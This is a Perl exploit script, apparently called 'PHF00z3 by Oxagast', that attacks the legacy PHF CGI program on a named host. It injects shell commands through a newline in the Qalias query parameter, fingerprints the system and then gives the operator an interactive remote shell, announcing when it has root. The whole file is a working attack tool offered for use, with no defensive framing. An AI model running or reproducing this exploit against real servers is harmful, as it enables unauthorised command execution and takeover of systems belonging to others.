#!/usr/bin/perl

# greets to josh arielle matt carley

use WWW::Mechanize;
if (scalar(@ARGV) < 1) {
	print "\n          --=== PHF00z3 by Oxagast ===--\n\n";
	print "   useage: ./$0 hostname\n\n";
	print " Play Nice :)\n";
	exit();
}
$scrape = WWW::Mechanize->new(timeout => 3);
print "Connecting...\n";
print "Checking if exploitable...\n";
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Auname%20-a");
$unamea = $scrape->content();
@unameafeed = split(/\n/, $unamea);
for $stupidpres (0..scalar(@unameafeed)) {
	if (@unameafeed[$stupidpres] =~ m/<PRE>/) {
		$realunamea = @unameafeed[$stupidpres+1];
	}
}
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Ash%20--version");
$shver = $scrape->content();
@shverfeed = split(/\n/, $shver);
for $stupidpres (0..scalar(@shverfeed)) {
	if (@shverfeed[$stupidpres] =~ m/<PRE>/) {
		@shverfeed[$stupidpres+1] =~ m/version (\d+\.\d)/;
		if ($1 ne "") {
			$realshver = "sh-$1";
		}
	}
}
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Als%20%20/bin");
$scraped = $scrape->content();
if($scraped =~ /chmod/m) {
	if($scraped =~ /mkdir/m) {
		if($scraped =~ /stty/m) {
			$startup = 1;
			$rootus = 0;
			while (0 < 1) {
				if ($startup == 1) {
					$cmd = "id";

				}
				if ($startup == 0) {
					if ($rootus == 0) {
						print "$realshver\$ ";
					}
					if ($rootus == 1) {
						print "$realshver\# ";
					}
					$cmd = <STDIN>;
				}
				$scrape->get("http:\/\/@ARGV[0]/cgi-bin/phf?Qalias=%0A$cmd");
				$scraped = $scrape->content();
				@feedback = split(/\n/, $scraped);
				for $line (0..scalar(@feedback)) {
					if (@feedback[$line] eq "<PRE>") {
						$outs = $line + 1;
					}
				}
				for $outline ($outs..scalar(@feedback)-2) {
					if ($startup == 1) {
						if (@feedback[$outline] =~ /\(root\)/) {
							print "OOooooo now look what we have here... :P r00t\n";
					print "$realunamea\n";
							$rootus = 1;
						}
						else {
							print "We got ourselves a shell... :)\n";
					print "$realunamea\n";
						}
					}
					print "@feedback[$outline]\n";
					$startup = 0;
				}
			}
		}
	}
}

else {
	print "OOps, doesn't look like she's vulnerable. :(\n";
}